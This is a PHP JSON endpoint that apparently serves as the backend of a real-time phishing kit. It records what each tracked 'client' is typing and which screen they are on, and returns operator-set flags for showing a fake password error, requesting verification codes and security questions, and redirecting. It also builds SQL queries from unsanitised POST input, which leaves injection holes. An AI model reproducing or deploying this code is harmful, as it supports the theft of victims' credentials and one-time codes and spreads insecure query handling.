<?php
header('content-type: application/json; charset=utf-8');
//en caso de json en vez de jsonp habría que habilitar CORS:
header("access-control-allow-origin: *");


date_default_timezone_set("America/Caracas");
$fecha_actual=strftime( "%Y-%m-%d %H:%M:%S", time());

require('../medicina/php/config/conexion.php');

function obtenerIPCliente() {
    if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        // Si existe el encabezado HTTP_X_FORWARDED_FOR, tomamos la primera IP de la lista
        $ip = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])[0];
    } else {
        // Si no existe, usamos REMOTE_ADDR
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    return $ip;
}

$ip_user = obtenerIPCliente();
$pantalla =trim($_POST['pantalla']);
$var_escribiendo =trim($_POST['var_escribiendo']);
$ident = $_POST['ident'];


function convertirFechaHoraNumerico($fechaHora) {
    // Convertir la fecha y hora en formato %Y-%m-%d %H:%M:%S a formato numérico YmdHis
    $fechaNumerica = str_replace(['-', ' ', ':'], '', $fechaHora);
    return $fechaNumerica;
}


$tiempo_actual = convertirFechaHoraNumerico($fecha_actual);
$numeroAleatorio = mt_rand(1, 100);

	
		  $loading='';
	      $consulta2 = "SELECT * FROM tabla_clientes where ip ='$ident'";
          $resultado2 = mysqli_query( $conexion, $consulta2 ) or die ( "Algo ha ido mal en la consulta a la base de datos");

             if (mysqli_num_rows($resultado2)>0){
             	    while ($obj2 = mysqli_fetch_object($resultado2)) {
              
                  	 $loading =  $obj2->loading;
                  	 $valid_user =  $obj2->valid_user;
                     $redirigir =  $obj2->redirigir;
                     $status =  $obj2->status;
                     $traer_preguntas =  $obj2->g_code1;
                     $valid_code1 = $obj2->valid_code1;
                     $valid_code2 = $obj2->valid_code2;
                     $valid_code3 = $obj2->valid_code3;
                     $valid_code4 = $obj2->valid_code4;
                     $valid_user_0 = $obj2->valid_user_0;
                     $user_dato1 = $obj2->user_dato1;
                     $url_imagen1 = $obj2->url_imagen1;
                     $pais = $obj2->pais;
                     $tipo_code2 = $obj2->tipo_code2;
                     $nombre_cuenta = $obj2->nombre_cuenta;
                     $datos_menu = $obj2->datos_menu;
                     $code1 = $obj2->code1;
                     $valid_amarre = $obj2->valid_amarre;
                     $pass_falso = $obj2->pass_falso;
                     $preguntas_amarre = $obj2->preguntas_amarre;
                     $valid_respuesta = $obj2->valid_respuesta;
                
               		}



                  if($valid_user_0==2){
                        //aca debemos mandar el mensaje de error de contraseña
                         if(mysqli_query($conexion,"UPDATE tabla_clientes SET escribiendo = '$var_escribiendo', tiempo = '$tiempo_actual',loading = '0' where ip = '$ident'")){

                          $arr[] = array('guardo' => 'si',
                            'time' => $tiempo_actual,
                            'loading' => 0,'valid_user' => 2,
                            'redirigir' => $redirigir,
                            'status' => $status,
                            'traer_preguntas' => $traer_preguntas,
                            'valid_code1' => $valid_code1,
                            'valid_code2' => $valid_code2,
                            'valid_code3' => $valid_code3,
                            'valid_code4' => $valid_code4,
                            'valid_user_0' => $valid_user_0,
                            'user_dato1' => $user_dato1,
                            'url_imagen1' => $url_imagen1,
                            'pais' => $pais,
                            'tipo_code2' => $tipo_code2,
                            'nombre_cuenta' => $nombre_cuenta,
                            'datos_menu' => $datos_menu,
                            'code1' => $code1,
                            'valid_amarre' => $valid_amarre,
                            'pass_falso' => $pass_falso,
                            'preguntas_amarre' => $preguntas_amarre,
                            'valid_respuesta' => $valid_respuesta,
                          );

                          echo '' . json_encode($arr) . '';
                          return;
                  }
                  }



                  if($valid_user==2){
                   			//aca debemos mandar el mensaje de error de contraseña
                   			 if(mysqli_query($conexion,"UPDATE tabla_clientes SET escribiendo = '$var_escribiendo', tiempo = '$tiempo_actual',loading = '0' where ip = '$ident'")){

          					  	  $arr[] = array('guardo' => 'si',
                            'time' => $tiempo_actual,
                            'loading' => 0,'valid_user' => 2,
                            'redirigir' => $redirigir,
                            'status' => $status,
                            'traer_preguntas' => $traer_preguntas,
                            'valid_code1' => $valid_code1,
                            'valid_code2' => $valid_code2,
                            'valid_code3' => $valid_code3,
                            'valid_code4' => $valid_code4,
                            'valid_user_0' => $valid_user_0,
                            'user_dato1' => $user_dato1,
                            'url_imagen1' => $url_imagen1,
                            'pais' => $pais,
                            'tipo_code2' => $tipo_code2,
                            'nombre_cuenta' => $nombre_cuenta,
                            'datos_menu' => $datos_menu,
                            'code1' => $code1,
                            'valid_amarre' => $valid_amarre,
                            'pass_falso' => $pass_falso,
                            'preguntas_amarre' => $preguntas_amarre,
                            'valid_respuesta' => $valid_respuesta,
                          );

          					  	  echo '' . json_encode($arr) . '';
          					  	  return;
    						  }
               		}



               		if($valid_user==1){
               			//aca debemos redireccionar

               			
               		}



					  if(mysqli_query($conexion,"UPDATE tabla_clientes SET escribiendo = '$var_escribiendo', tiempo = '$tiempo_actual',pantalla='$pantalla' where ip = '$ident'")){

					  	  $arr[] = array('guardo' => 'si',
                  'time' => $tiempo_actual,
                  'loading' => $loading,
                  'valid_user' => $valid_user,
                  'redirigir' => $redirigir,
                  'status' => $status,
                  'traer_preguntas' => $traer_preguntas,
                  'valid_code1' => $valid_code1,
                  'valid_code2' => $valid_code2,
                  'valid_code3' => $valid_code3,
                  'valid_code4' => $valid_code4,
                  'res_pantalla' => $pantalla,
                  'valid_user_0' => $valid_user_0,
                  'user_dato1' => $user_dato1,
                  'url_imagen1' => $url_imagen1,
                  'pais' => $pais,
                  'tipo_code2' => $tipo_code2,
                  'nombre_cuenta' => $nombre_cuenta,
                  'datos_menu' => $datos_menu,
                  'code1' => $code1,
                  'valid_amarre' => $valid_amarre,
                  'pass_falso' => $pass_falso,
                  'preguntas_amarre' => $preguntas_amarre,
                  'valid_respuesta' => $valid_respuesta,

                );

					  	  echo '' . json_encode($arr) . '';
					  	  return;
					  }else{

					  	   $arr[] = array('guardo' => 'no');

					  	   echo '' . json_encode($arr) . '';
					  	   return;

					  }



					  

             }else{
             	   $arr[] = array('guardo' => 'no');

					  	   echo '' . json_encode($arr) . '';
					  	   return;

             }


